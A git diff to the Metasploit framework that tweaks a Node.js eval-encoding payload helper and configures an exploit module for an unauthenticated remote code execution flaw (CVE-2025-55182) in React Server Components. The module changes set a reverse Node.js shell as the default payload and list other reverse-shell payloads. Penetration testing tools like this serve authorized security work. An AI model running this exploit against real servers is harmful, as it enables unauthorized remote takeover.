diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb index 89190672acf88..8080f3642ad07 100644 --- a/lib/msf/core/payload/nodejs.rb +++ b/lib/msf/core/payload/nodejs.rb @@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={}) # @param [String] code the javascript code to run # @return [String] a command that invokes "node" and passes the code def nodejs_cmd(code) - "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'" + "node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'" end end diff --git a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb index 695b4a1994baa..6d6fa41ef2e42 100644 --- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb +++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb @@ -32,7 +32,7 @@ def initialize(info = {}) ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'], ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3'] ], - 'Platform' => ['multi'], + 'Platform' => %w[unix linux win], 'Arch' => [ARCH_CMD], 'Targets' => [ [ @@ -40,8 +40,9 @@ def initialize(info = {}) { 'Platform' => ['unix', 'linux'], 'DefaultOptions' => { - 'FETCH_COMMAND' => 'WGET' + 'PAYLOAD' => 'cmd/unix/reverse_nodejs' } + # Tested with cmd/unix/reverse_nodejs # Tested with cmd/unix/reverse_bash # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp } @@ -55,7 +56,10 @@ def initialize(info = {}) ], ], 'Payload' => { - 'BadChars' => '"' + 'BadChars' => '"', + 'Space' => 131068, + 'DisableNops' => true, + 'Encoder' => 'cmd/base64' }, 'DefaultTarget' => 0, 'DisclosureDate' => '2025-12-03',